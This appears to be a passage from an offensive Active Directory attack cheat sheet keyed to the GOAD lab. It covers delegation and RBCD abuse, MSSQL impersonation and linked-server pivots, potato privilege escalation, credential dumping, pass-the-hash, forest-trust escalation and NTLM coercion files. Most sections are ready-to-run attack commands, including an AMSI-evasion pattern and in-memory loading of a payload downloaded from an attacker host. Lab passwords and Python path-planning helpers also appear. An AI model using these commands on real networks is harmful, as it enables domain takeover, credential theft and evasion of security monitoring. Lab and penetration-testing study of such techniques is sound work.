Rubeus.exe triage
Rubeus.exe dump /luid:0x3e7 /service:krbtgt
# Linux (after TGT extraction and conversion to ccache)
export KRB5CCNAME=dc_tgt.ccache
secretsdump.py -k dc.domain.local -just-dc
```
- Impact: Full domain compromise via DCSync
Vulnerability: S4U2Self + S4U2Proxy allows impersonation
- Configuration: `TRUSTED_TO_AUTH_FOR_DELEGATION` + `msDS-AllowedToDelegateTo`
- Attack Chain:
  - Identify accounts with constrained delegation
  - Use S4U2Self to obtain a forwardable ticket for any user
  - Use S4U2Proxy to access the target service
  - Modify the SPN if needed (`-altservice` in getST.py, `/altservice` in Rubeus): the service class is not protected, so a ticket obtained for `cifs/host` can be rewritten to `ldap/host` or `host/host`
- Tools: Rubeus, getST.py
- Exploitation:
```
# Linux
getST.py -spn 'cifs/dc.domain.local' -impersonate administrator domain/delegated_user:password
# getST writes administrator@cifs_dc.domain.local@DOMAIN.LOCAL.ccache; point KRB5CCNAME at that file
export KRB5CCNAME=administrator.ccache
secretsdump.py -k dc.domain.local -just-dc
```
- Key Feature: Can impersonate privileged users to access target SPNs, unless the user is marked "sensitive and cannot be delegated" or is a member of Protected Users (S4U2Proxy then refuses)
Vulnerability: Requires forwardable tickets but can be bypassed
- Limitation: Cannot perform S4U2Self (needs forwardable tickets)
- Bypass: RBCD workaround
- Create intermediary computer account
- Configure RBCD on intermediary
- Execute S4U2Self/S4U2Proxy chain
- Modify service names as needed
- Impact: Similar to standard constrained delegation
Vulnerability: Write access to msDS-AllowedToActOnBehalfOfOtherIdentity
- Requirements:
  - GenericAll/GenericWrite on the computer object
  - Ability to create machine accounts (MAQ=10 by default)
- Attack Chain:
  - Create an attacker-controlled computer account
  - Set `msDS-AllowedToActOnBehalfOfOtherIdentity` on the target
  - Perform S4U2Self to get a forwardable ticket
  - Perform S4U2Proxy to impersonate admin on the target
  - Gain admin access to the target system
- Tools: rbcd.py, addcomputer.py, getST.py
- Exploitation:
```
# Create computer account
addcomputer.py -computer-name 'EVILPC$' -computer-pass 'P@ssw0rd' domain/user:password
# Configure RBCD (the attribute is a security descriptor whose ACE names EVILPC$)
rbcd.py -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write domain/user:password
# Request tickets: S4U2Self for administrator, then S4U2Proxy to cifs on the target
getST.py -spn 'cifs/target.domain.local' -impersonate administrator -dc-ip 192.168.56.11 domain/'EVILPC$':'P@ssw0rd'
# Use the ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k target.domain.local
```
- Impact: Administrator access to target computers
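The AS-REP, unconstrained, constrained and RBCD sections above all hinge on a few `userAccountControl` bits and two attributes, and on one precondition that is easy to forget: the account you impersonate must not be marked sensitive or sit in Protected Users. The Python below is an added example (not GOAD code and not a real LDAP dump) that classifies accounts the way the BloodHound and PowerView queries on this page do, applies the "offensive tip" bit flip, and answers the question "who can already reach this host?" The UAC constants are the real MS-ADTS values; `ACCOUNTS` is constructed, and its RBCD attribute is modelled as a list of principal names instead of the binary security descriptor the directory actually stores.

```python
from typing import Dict, List

# userAccountControl bits (MS-ADTS); the constants are real, the accounts below are constructed.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
UF_DONT_REQUIRE_PREAUTH = 0x400000             # AS-REP roastable
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition


def delegation_findings(acct: dict) -> List[str]:
    """Classify one account the way the BloodHound/PowerView delegation queries do."""
    uac = acct["userAccountControl"]
    if uac & UF_ACCOUNTDISABLE:
        return ["disabled"]
    out = []
    if uac & UF_DONT_REQUIRE_PREAUTH:
        out.append("asrep-roastable")
    if uac & UF_TRUSTED_FOR_DELEGATION:
        # every DC has this bit; on a member server or user it is the interesting case
        out.append("unconstrained-delegation" + (" (DC, expected)" if uac & UF_SERVER_TRUST_ACCOUNT else ""))
    targets = acct.get("msDS-AllowedToDelegateTo", [])
    if targets:
        kind = "protocol-transition" if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION else "kerberos-only"
        out.append(f"constrained-delegation[{kind}] -> {', '.join(targets)}")
    if acct.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        out.append("rbcd-configured")
    if uac & UF_NOT_DELEGATED:
        out.append("protected-from-delegation")
    return out


def can_be_impersonated(acct: dict) -> bool:
    """S4U2Proxy refuses a forwardable ticket for sensitive accounts and Protected Users members,
    so run this on the intended victim before spending time on getST.py."""
    return not (acct["userAccountControl"] & UF_NOT_DELEGATED) and \
        "Protected Users" not in acct.get("memberOf", [])


def enable_asrep(uac: int) -> int:
    """The 'offensive tip' above: with write access, set the bit and the account becomes AS-REP roastable."""
    return uac | UF_DONT_REQUIRE_PREAUTH


def paths_to_host(accounts: Dict[str, dict], host_fqdn: str) -> List[str]:
    """Which principals can already obtain a service ticket to host_fqdn through constrained
    delegation (their msDS-AllowedToDelegateTo) or through RBCD configured on the host's object."""
    hits = []
    for name, acct in accounts.items():
        for spn in acct.get("msDS-AllowedToDelegateTo", []):
            if spn.split("/", 1)[-1].lower() == host_fqdn.lower():
                hits.append(f"{name} -> {spn}")
    target_name = host_fqdn.split(".")[0].upper() + "$"
    for allowed in accounts.get(target_name, {}).get("msDS-AllowedToActOnBehalfOfOtherIdentity", []):
        hits.append(f"{allowed} -> rbcd on {target_name}")
    return hits


# Constructed directory snapshot (sAMAccountName -> attributes), not a real LDAP export.
ACCOUNTS: Dict[str, dict] = {
    "WINTERFELL$": {"userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    "brandon.stark": {"userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    "jon.snow": {"userAccountControl": UF_NORMAL_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
                 "msDS-AllowedToDelegateTo": ["CIFS/winterfell.north.sevenkingdoms.local"]},
    "sensitive.admin": {"userAccountControl": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED,
                        "memberOf": ["Domain Admins"]},
    "TARGET$": {"userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
                "msDS-AllowedToActOnBehalfOfOtherIdentity": ["EVILPC$"]},
    "old.svc": {"userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
}
```

On a live domain the same logic runs over an LDAP search for `(|(userAccountControl:1.2.840.113556.1.4.803:=4194304)(userAccountControl:1.2.840.113556.1.4.803:=524288)(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))`; the only extra work is decoding the RBCD security descriptor into the principal list the example takes as input.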
Vulnerability: Default setting allows domain users to create 10 computer objects
- Default Value: `ms-DS-MachineAccountQuota = 10`
- Impact: Enables RBCD, DNS spoofing, and Kerberos relay attacks
- Discovery: `crackmapexec ldap dc.domain.local -u user -p password -M maq`
Vulnerability: Users with impersonation privileges can assume identity of other logins
- GOAD Context (castelblack / SRV02):
  - `NORTH\samwell.tarly` can impersonate the `sa` login → instance sysadmin
  - `NORTH\brandon.stark` can impersonate `NORTH\jon.snow` (who is a sysadmin) → indirect path to sysadmin
- GOAD Context (braavos / SRV03):
  - `ESSOS\jorah.mormont` can impersonate the `sa` login → instance sysadmin
- Attack Chain:
  - Enumerate impersonation permissions (`sys.server_permissions` rows with `permission_name = 'IMPERSONATE'`, or `enum_impersonate` in mssqlclient.py)
  - Execute commands as the privileged login (`REVERT` drops back to your own login afterwards)
  - Enable xp_cmdshell if needed
  - Execute OS commands
- Tools: mssqlclient.py, PowerUpSQL
- Exploitation:
```
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
```
Vulnerability: Database-level impersonation of dbo user
- Requirements: Database "trustworthy" property enabled
- GOAD Context (castelblack / SRV02): `NORTH\arya.stark` can impersonate `dbo` in both the `master` and `msdb` databases
- Impact: Elevated database privileges; when such a database is owned by `sa` and marked trustworthy, `EXECUTE AS USER = 'dbo'` inside it yields sysadmin-equivalent rights at the instance level
Vulnerability: MSSQL can coerce NTLM authentication
- Methods (callable by any login, these procedures are granted to public by default):
  - `xp_dirtree '\\attacker-ip\share'`
  - `xp_fileexist '\\attacker-ip\share'`
  - `xp_subdirs '\\attacker-ip\share'`
- Impact: Capture the SQL Server service account's NetNTLM hash (the machine account when the service runs under a virtual account) for relay attacks
- Tools: Responder, ntlmrelayx
Vulnerability: SQL Server links between database instances
- GOAD Context: Bidirectional cross-forest linked-server chain between castelblack and braavos:
  - `castelblack.north.sevenkingdoms.local` → `BRAAVOS` (login mapping `NORTH\jon.snow` → remote `sa`, password `sa_P@ssw0rd!Ess0s`)
  - `braavos.essos.local` → `CASTELBLACK` (login mapping `ESSOS\khal.drogo` → remote `sa`, password `Sup1_sa_P@ssw0rd!`)
  - See the `mssql.linked_servers` blocks in `ad/GOAD/data/config.json` for the canonical mappings.
- Attack: Chain queries across linked servers to pivot between systems (and across the forest trust)
- Exploitation:
```
SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT SYSTEM_USER');
EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER];
```
- Caveat: `EXEC ... AT` needs the link's `rpc out` option enabled (`sp_serveroption 'LINKED_SERVER', 'rpc out', 'true'`); `OPENQUERY` works without it but only for statements that return a result set. Each hop runs as the remote mapped login, so the chain only reaches as far as the mapping on the current hop allows.
- Impact: Command execution across multiple database servers, cross-forest pivoting
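The impersonation and linked-server sections above together form a small graph: server-level IMPERSONATE grants are edges inside an instance, sysadmin membership lets a login become any other login, and a linked-server login mapping is an edge to another instance. The Python below is an added example (not GOAD's or PowerUpSQL's code) that walks that graph the way you would when deciding which GOAD login is worth compromising. The edge tables are constructed from the GOAD context on this page and assume nothing else is granted; `ENUM_IMPERSONATE_SQL` is the standard query that would populate `IMPERSONATE` on a live instance. Database-level `dbo` impersonation in TRUSTWORTHY databases is not modelled.

```python
from collections import deque
from typing import Dict, List, Optional, Tuple

# Edge set constructed from the GOAD context above. Assumption: these are the only server-level
# IMPERSONATE grants, sysadmin members and linked-server login mappings on the two instances.
IMPERSONATE: Dict[str, List[Tuple[str, str]]] = {  # instance -> [(grantee, login it may EXECUTE AS)]
    "castelblack": [("NORTH\\samwell.tarly", "sa"), ("NORTH\\brandon.stark", "NORTH\\jon.snow")],
    "braavos": [("ESSOS\\jorah.mormont", "sa")],
}
SYSADMINS = {"castelblack": {"sa", "NORTH\\jon.snow"}, "braavos": {"sa", "ESSOS\\khal.drogo"}}
LINKS = [  # (source instance, linked server name, destination instance, local login, remote login)
    ("castelblack", "BRAAVOS", "braavos", "NORTH\\jon.snow", "sa"),
    ("braavos", "CASTELBLACK", "castelblack", "ESSOS\\khal.drogo", "sa"),
]

# T-SQL that fills IMPERSONATE on a live instance; for this permission class major_id is the
# impersonated server principal.
ENUM_IMPERSONATE_SQL = """
SELECT gr.name AS grantee, im.name AS impersonated
FROM sys.server_permissions p
JOIN sys.server_principals gr ON p.grantee_principal_id = gr.principal_id
JOIN sys.server_principals im ON p.major_id = im.principal_id
WHERE p.permission_name = 'IMPERSONATE' AND p.state_desc = 'GRANT';
"""

State = Tuple[str, str]   # (instance, login we currently run as)


def is_sysadmin(inst: str, login: str) -> bool:
    return login in SYSADMINS.get(inst, set())


def moves(inst: str, login: str):
    """Yield (next_state, how) for every hop the current login can take from here."""
    for grantee, target in IMPERSONATE.get(inst, []):
        if grantee == login:
            yield (inst, target), f"{inst}: EXECUTE AS LOGIN = '{target}'"
    if is_sysadmin(inst, login):
        # sysadmin may EXECUTE AS any login, which unlocks every link mapping on this instance
        for src, name, dst, local, remote in LINKS:
            if src == inst and local != login:
                yield (inst, local), f"{inst}: EXECUTE AS LOGIN = '{local}' (sysadmin)"
    for src, name, dst, local, remote in LINKS:
        if src == inst and local == login:
            yield (dst, remote), f"{inst}: EXEC ('...') AT [{name}] -> {dst} as {remote}"


def escalation_path(start_inst: str, start_login: str, goal_inst: str) -> Optional[List[str]]:
    """Shortest chain of impersonations and link hops from the start login to sysadmin on
    goal_inst. Returns [] if already there, None if unreachable with the modelled edges."""
    start: State = (start_inst, start_login)
    parent: Dict[State, Optional[Tuple[State, str]]] = {start: None}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if cur[0] == goal_inst and is_sysadmin(*cur):
            steps = []
            while parent[cur] is not None:
                cur, how = parent[cur]
                steps.append(how)
            return steps[::-1]
        for nxt, how in moves(*cur):
            if nxt not in parent:
                parent[nxt] = (cur, how)
                queue.append(nxt)
    return None
```

Run `escalation_path("castelblack", "NORTH\\brandon.stark", "braavos")` and the result reads like the attack plan: impersonate jon.snow, then cross the BRAAVOS link as `sa`. A login with no outgoing edge (arya.stark at the server level) returns None, which is the signal to look at database-level paths instead.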
Vulnerability: Extended stored procedure for OS command execution
- Requirements: Administrative access or impersonation
- Default: Usually disabled, but can be enabled
- Impact: Direct operating system command execution as SQL Server service account
Vulnerability: Database property determining impersonation scope
- Risk: Allows database-level impersonation to escalate to instance-level
- Detection:
SELECT name, is_trustworthy_on FROM sys.databases;
Vulnerability: Service accounts (IIS, MSSQL) have SeImpersonate privilege by default
- Tools: PrintSpoofer, SweetPotato, BadPotato, JuicyPotato, RoguePotato, GodPotato
- Exploitation Techniques:
  - PrintSpoofer: Abuses the Print Spooler service (named pipe impersonation) to impersonate SYSTEM; the Spooler service must be running
```
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\path\to\reverse_shell.bat"
```
  - SweetPotato: Unified "potato" technique that defaults to PrintSpoofer
    - Creates a temporary directory and loads the binary via `Assembly.Load()` into PowerShell
    - Executes a batch file containing the reverse shell commands
```
# In-memory loading via PowerSharpPack
Invoke-SweetPotato -Command "C:\temp\shell.bat"
```
  - BadPotato: Alternative when other potatoes are detected
    - Requires an AMSI bypass before execution due to Defender detection
    - Can be loaded via the PowerSharpPack wrapper
```
# AMSI bypass required first
Invoke-BadPotato -Command "cmd /c whoami"
```
- Common Trigger: Web shells on IIS provide the initial SeImpersonate context
- Check: `whoami /priv` must list SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege); without it every potato variant fails
- Impact: Escalation from service account (IIS AppPool, SQL Service) to SYSTEM privileges
Vulnerability: Kerberos relay when LDAP signing not enforced
- Requirements Verification:
  - LDAP Signing: check with the CME module `cme ldap DC_IP -u user -p pass -M ldap-signing`
  - Machine Account Quota (MAQ): `cme ldap DC_IP -u user -p pass -M maq` (default: 10)
- Attack Chain:
  1. Add a computer account:
```
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Password123' domain/user:password
```
  2. Extract the machine account SID (KrbRelay takes the SID, not the name):
```
pywerview get-netcomputer -u user -p password -d domain --computername YOURPC
```
  3. Launch KrbRelay with a CLSID:
```
# Target the LDAP service with a specific CLSID; -rbcd takes the SID from the previous step
KrbRelay.exe -spn ldap/DC.domain.local -clsid {CLSID} -rbcd S-1-5-21-...-RID
```
  4. Configure RBCD: KrbRelay automatically writes `msDS-AllowedToActOnBehalfOfOtherIdentity` on the local machine's computer object
  5. Request an impersonated ticket:
```
# Using Impacket
getST.py -spn cifs/target.domain.local -impersonate administrator domain/'YOURPC$':'Password123'
# Using Rubeus (Windows)
Rubeus.exe hash /password:Password123 /user:YOURPC$ /domain:domain.local
Rubeus.exe s4u /user:YOURPC$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt
```
  6. Execute commands:
```
wmiexec.py -k -no-pass domain/administrator@target.domain.local
```
- Tools: KrbRelayUp (all-in-one), KrbRelay, Rubeus, Impacket
- Defender Note: KrbRelay may evade Defender detection (as of writeup date)
- Impact: System-level privilege escalation from a local service account
Vulnerability: PowerShell AMSI can be bypassed using multi-stage techniques
- Two-Stage Approach:
  - PowerShell Level: Modified reflection methods with string fragmentation to avoid signature detection
    - Fragment known signatures: `"Am'+'siUt'+'ils"` instead of `"AmsiUtils"`
    - Use reflection to access internal .NET methods
  - .NET Level: Patch amsi.dll's `AmsiScanBuffer` function using kernel32 API calls
    - Use `GetProcAddress` to locate the function
    - Modify memory protection with `VirtualProtect`
    - Patch the function to return a clean scan result
- Common Bypass Patterns:
```
# Example string fragmentation pattern (the pieces concatenate to System.Management.Automation.AmsiUtils)
$a = 'Sy'+'st'+'em.Ma'+'nag'+'ement.Aut'+'omati'+'on.Am'+'siUt'+'ils'
```
- Impact: Execute malicious PowerShell and load .NET assemblies without AV detection
- Note: Modern EDR may still detect behavioral patterns even with an AMSI bypass, and well-known fragmentations like the one above are themselves frequently signatured, so expect to vary the split
Vulnerability: Lack of EDR/AV monitoring of .NET assembly loading
- Philosophy: "The disk is lava": avoid writing files to disk to evade file-based detection
- Method: Load .NET assemblies directly into memory using `Assembly.Load()` or reflection
- Tools & Techniques:
  - PowerSharpPack: Pre-compiled .NET tools wrapped with public class/method interfaces for easy PowerShell invocation
  - Invoke-SharpLoader: Generic loader for .NET assemblies
  - WinPEAS: Enumeration tool loaded entirely in memory via `Assembly.Load()` from HTTP-served payloads
- Example Loading Pattern:
```
# Download and load an assembly in memory, then call its entry point
$bytes = (New-Object Net.WebClient).DownloadData('http://attacker/tool.exe')
[System.Reflection.Assembly]::Load($bytes)
[Namespace.Class]::Method()
```
- CheckPort.exe: Verify available outbound ports for reverse shells before exploitation
- Impact: Defense evasion (bypasses file-based AV/EDR detection). Note that on .NET Framework 4.8 and later `Assembly.Load` hands the byte array to AMSI before loading it, which is why the AMSI bypass above has to come first.
Vulnerability: IIS application with file upload functionality
- Target in GOAD: 192.168.56.22 (IIS server with vulnerable upload functionality)
- Example: Simple ASP.NET application allowing unrestricted file uploads without extension validation
- Exploitation:
  - Upload an ASPX web shell via the vulnerable upload form (common web shells: `cmd.aspx`, `simple-backdoor.aspx`)
  - Access the web shell via browser at the uploaded path, e.g. `http://192.168.56.22/uploads/shell.aspx`
  - Execute commands as the IIS AppPool identity (has SeImpersonatePrivilege)
  - Chain with potato exploits for SYSTEM
- Post-Upload Attack Path:
  - Verify privileges: `whoami /priv` (look for SeImpersonatePrivilege)
  - Bypass AMSI if using PowerShell
  - Load exploitation tools in memory
  - Execute SweetPotato/PrintSpoofer for SYSTEM
- Impact: Initial access → SeImpersonate → SYSTEM privileges
Vulnerability: UAC bypass techniques
- Impact: Elevation from medium to high integrity process
- Tools: SCMUACBypass
Method: Extract local NT hashes from the SAM hive (C:\Windows\System32\config\SAM)
- Requirements: Local admin access; the SAM and SYSTEM hives (SYSTEM holds the boot key needed to decrypt SAM), exported with reg save or taken from a shadow copy
- Tools: secretsdump.py, reg save
- Exploitation:

```
secretsdump.py -sam SAM -system SYSTEM LOCAL
```

- Caveat: these are local accounts only; they matter where the local Administrator password is reused across hosts (see pass-the-hash)
Method: Extract from HKLM\SECURITY registry hive
- Data Retrieved:
- Cached domain logon information (DCC2 hashes)
- Machine account credentials
- Service account passwords
- Tools: secretsdump.py, mimikatz
Method: Extract credentials from LSASS memory
- Requirements: Local admin on the target (SeDebugPrivilege); Credential Guard isolates NTLM hashes and TGTs in LSAIso and defeats these dumps
- Tools: lsassy, Dumpert, procdump, mimikatz
- Retrieved Data:
  - Domain NTLM hashes
  - Kerberos tickets (TGT/TGS)
  - Plaintext passwords (if WDigest enabled)
- Exploitation:

```
lsassy -u user -p password -d domain target-ip
```
Method: Authenticate using the NT hash without knowing the password (pass-the-hash)
- Tools: crackmapexec, impacket, evil-winrm
- Exploitation:

```
cme smb target-range -u administrator -H ntlm-hash
wmiexec.py -hashes :ntlm-hash administrator@target
```

- Caveat: for local accounts only the built-in Administrator (RID 500) gets a full admin token over the network by default; other local admins are filtered by UAC remote restrictions unless `LocalAccountTokenFilterPolicy` is set to 1. Domain accounts are not affected.
Methods:
- psexec.py: Service-based execution (most detectable)
- wmiexec.py: WMI process creation (stealthier)
- smbexec.py: Service creation per request (no executable upload)
- atexec.py: Scheduled task exploitation
- dcomexec.py: DCOM abuse
Method: PowerShell remoting over WinRM (HTTP/HTTPS)
- Port: 5985 (HTTP), 5986 (HTTPS)
- Requirements: Valid credentials or NT hash; the account must be a local administrator or a member of Remote Management Users on the target
- Exploitation:

```
evil-winrm -i target -u user -p password
evil-winrm -i target -u user -H ntlm-hash
```
Method: RDP without sending credentials to the target (Restricted Admin mode, pass-the-hash over RDP)
- Requirements: Restricted Admin mode enabled on the target (`DisableRestrictedAdmin` = 0 under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa`); if it is off, an administrator can turn it on with that registry value
- Tools: xfreerdp
- Exploitation:

```
xfreerdp /u:administrator /pth:ntlm-hash /v:target /restricted-admin
```
Method: Convert an NT hash into a Kerberos TGT (overpass-the-hash)
- Tools: Rubeus, getTGT.py
- Exploitation:

```
getTGT.py domain/user -hashes :ntlm-hash
export KRB5CCNAME=user.ccache
```

- Note: an NT hash forces RC4 (etype 23) in the AS-REQ, which stands out where AES is the norm; pass the account's AES key (`getTGT.py -aesKey`) instead when you have it
Method: Use extracted Kerberos tickets (pass-the-ticket)
- Source: LSASS memory dumps, Rubeus extraction (`.kirbi`)
- Tools: Rubeus, ticketConverter.py (converts between `.kirbi` and `.ccache`)
- Exploitation:

```
export KRB5CCNAME=ticket.ccache
smbclient.py -k -no-pass dc.domain.local
```
Method: Authenticate with a compromised certificate (PKINIT)
- Tools: certipy
- Exploitation:

```
certipy auth -pfx user.pfx -dc-ip 192.168.56.11
```

- Result: a TGT saved as `.ccache` plus the account's NT hash (recovered through U2U), so a stolen certificate gives both pass-the-ticket and pass-the-hash
Vulnerability: Child domain compromise allows parent domain escalation (golden ticket with ExtraSid)
- Attack Chain:
  - Extract the child domain krbtgt hash (DCSync)
  - Obtain the child and parent domain SIDs (e.g. lookupsid.py)
  - Forge a golden ticket whose ExtraSids contains the parent's Enterprise Admins SID (parent domain SID + `-519`)
  - Authenticate to the parent domain as Enterprise Admin (SID filtering is not applied between domains of the same forest by default)
- Tools: ticketer.py, mimikatz
- Exploitation:

```
# Get krbtgt hash and SIDs
secretsdump.py domain/user:password@dc
# Forge ticket
ticketer.py -nthash krbtgt-hash -domain child.domain.local -domain-sid S-1-5-21-CHILD-SID -extra-sid S-1-5-21-PARENT-SID-519 -user-id 500 administrator
# Use ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass parent-dc.domain.local -just-dc
```
Vulnerability: Trust keys enable cross-domain authentication (trust ticket forgery)
- Attack Chain:
  - Extract the trust key: in the child's NTDS it is the NT hash of the trust account named after the parent's NetBIOS name (e.g. `SEVENKINGDOMS$` in north)
  - Forge an inter-realm TGT (referral ticket) for SPN `krbtgt/parent_domain`, encrypted with the trust key and carrying the same ExtraSid as above
  - Present it to the parent KDC to request service tickets in the parent domain
- Advantage: Works even if the child krbtgt password has been changed twice (which kills a golden ticket); only rotation of the trust key, which happens automatically every 30 days, invalidates it
- Tools: ticketer.py, mimikatz
Vulnerability: Automated child-to-parent escalation
- Tool: raiseChild.py (Impacket)
- Exploitation:

```
raiseChild.py child.domain.local/admin:password
```

- Impact: One command DCSyncs the child krbtgt, forges the ExtraSid golden ticket for Enterprise Admins, and uses it to DCSync the forest root Administrator's credentials
Vulnerability: DCs have unconstrained delegation by default
- Attack Chain:
  - Compromise an account or host with unconstrained delegation in the child domain (the child DC itself qualifies)
  - Coerce the parent DC into authenticating to it (PetitPotam, PrinterBug); the parent DC's TGT arrives in the forwarded ticket
  - Extract the parent DC's TGT (Rubeus monitor, mimikatz)
  - DCSync the parent domain with that TGT
- Impact: Parent domain compromise
Vulnerability: Identical usernames with the same passwords in different forests
- Method: Dump NTDS from one forest (secretsdump.py -just-dc-ntlm) and test the NT hashes against the matching accounts of the other forest
- Common: Frequently exploitable in production environments, where administrators reuse passwords across forests
Vulnerability: Cross-forest group memberships (Foreign Security Principals)
- Discovery: Enumerate foreign users/groups in trusted forests (FSPs live under CN=ForeignSecurityPrincipals and show up as members of local groups)
- Attack Vectors (against the foreign account, or the groups it sits in):
  - Shadow credentials
  - Password changes
  - Kerberoasting
- Tools: BloodHound, PowerView
Vulnerability: SID history enabled on forest trusts
- Attack: Forge golden tickets with external forest group memberships
- Exploitation: "Can spoof any RID >1000 group if SID history is enabled"
- Impact: ACL exploitation across domain boundaries
Vulnerability: Database trust relationships span forest boundaries
- Attack: Use linked servers to execute commands across forests
- Impact: Cross-forest pivoting and command execution
Vulnerability: Windows resolves UNC paths in .lnk files when the containing folder is viewed (Explorer fetches the icon)
- Tool: crackmapexec slinky module
- Exploitation:

```
cme smb target -u user -p password -M slinky -o SERVER=attacker-ip NAME=document
```

- Impact: NetNTLM hash capture via Responder from every user who browses the writable share
Vulnerability: Shell command files (.scf) trigger authentication
- Tool: crackmapexec scuffy module
- Similar to: .lnk files but using a different file format (the IconFile entry points at the attacker's UNC path)
Vulnerability: Internet shortcut (.url) files with UNC paths
- Method: Create a .url file whose IconFile points to an attacker-controlled UNC path
- Trigger: User browses the share containing the malicious .url file
- Impact: Authentication callback for hash capture
Vulnerability: WebClient service can be triggered to start, enabling HTTP-based authentication
- Method: Upload `.searchConnector-ms` files to accessible shares
- searchConnector-ms File Structure:

```
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription>
  <iconReference>\\attacker-ip@80\webdav\icon.ico</iconReference>
  <description>Search</description>
  <isSearchOnlyItem>false</isSearchOnlyItem>
  <includeInStartMenuScope>true</includeInStartMenuScope>
  <templateInfo>
    <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
  </templateInfo>
  <simpleLocation>
    <url>\\attacker-ip@80\webdav</url>
  </simpleLocation>
</searchConnectorDescription>
```

- Attack Chain:
  - Drop the `.searchConnector-ms` file on an accessible share
  - When a user browses the share, Explorer parses it and the WebDAV path (`\\host@80\...`) starts the WebClient service
  - The victim authenticates over HTTP (WebDAV), so the NTLM exchange carries no SMB signing requirement and can be relayed
  - Relay to LDAP/LDAPS for shadow credentials or RBCD attacks
- Requirements:
  - WebClient service installed (present on workstations; not installed on servers by default)
  - User must browse the share containing the malicious file
- LDAP Relay (if LDAP signing and channel binding are not enforced):
  - Add shadow credentials → PKINIT authentication as the relayed account
  - Configure RBCD → impersonate admin (needs a relayed computer account, e.g. coerced over WebDAV with PetitPotam/Coercer)
- Impact: HTTP-to-LDAP relay enables domain compromise from workstations
Vulnerability: Access tokens of logged-on users on a compromised system can be stolen
- Method: Use stolen tokens to execute commands as other users without their credentials
- Token Types:
  - Delegation tokens: Created for interactive logons (RDP, console); usable for network authentication to other hosts
  - Impersonation tokens: Created for non-interactive sessions; only valid for local actions
- Tools: incognito (Meterpreter), Invoke-TokenManipulation, TokenDuplicator
- Exploitation Flow:

```
# List available tokens
Invoke-TokenManipulation -Enumerate
# Impersonate specific user token
Invoke-TokenManipulation -ImpersonateUser -Username "DOMAIN\admin"
# Execute command with impersonated token
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "DOMAIN\admin"
```

- Requirements: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (local admin or SYSTEM in practice); a token only exists while the user's session or process is alive
- Impact: Execute commands as other logged-in users without their credentials
Vulnerability: A local administrator can hijack other users' active RDP sessions (demonstrated in the writeup on Server 2016)
- Method: Use `tscon.exe` from a SYSTEM context to attach another user's session to the attacker's own session
- Requirements:
  - SYSTEM privileges (use `Psexec64.exe -s cmd.exe` to elevate)
  - An active (or disconnected) RDP session of the target user exists
  - Not version-specific: it works on current Windows versions and Microsoft treats it as by-design, so patching does not remove it
- Exploitation:

```
# Enumerate active sessions
query user
# Example output:
#  USERNAME       SESSIONNAME  ID  STATE
#  administrator  rdp-tcp#1    2   Active
#  victim_user    rdp-tcp#0    1   Active
# Hijack victim's session (run from SYSTEM context)
tscon.exe 1 /dest:rdp-tcp#1
```

- Impact: Take over another user's desktop session without credentials
Vulnerability: sAMAccountName spoofing (noPac, CVE-2021-42278 / CVE-2021-42287) via computer account manipulation
- Attack Chain:
  - Add a computer account (MAQ=10 by default lets any domain user do this)
  - Clear the computer account's SPNs
  - Rename it (sAMAccountName) to the domain controller's name without the trailing `$`
  - Obtain a TGT for that name
  - Restore the original name
  - Request a service ticket via S4U2self: the KDC no longer finds the name, appends `$`, and issues the ticket as the DC
  - Perform DCSync with it
- Tools: noPac (Windows/cube0x0), noPac.py (Linux/Impacket)
- Patched: November 2021
- Impact: Domain admin privileges
Vulnerability: PrintNightmare (CVE-2021-1675 / CVE-2021-34527): the Print Spooler lets an authenticated user install a printer driver DLL that runs as SYSTEM
- Affected Systems: Windows Server 2016, 2019 (unpatched)
- Requirements:
  - Active Print Spooler service
  - Domain user credentials
  - SMB share for DLL delivery
- Exploitation:
  - Create a malicious DLL payload
  - Host it on an SMB share
  - Trigger the exploit (RpcAddPrinterDriverEx) against the target
  - Gain SYSTEM privileges
- Tools: CVE-2021-1675.py, cube0x0 PoC
- Patched: June/July 2021 (but exploitation still possible if unpatched)
- Cleanup: Driver files in spool directories
Vulnerability: Certifried (CVE-2022-26923): computer account dNSHostName spoofing for certificate abuse
- Attack Chain:
  - Create a computer account (MAQ)
  - Set its `dNSHostName` to the DC's hostname (after clearing the SPNs that contain the old name)
  - Request a certificate from the Machine template
  - The certificate is issued with the DC's identity in the SAN
  - Authenticate as the DC (PKINIT) and DCSync
- Tools: Certipy
- Patched: May 2022 (the fix binds certificates to the account's objectSid through the new SID security extension)
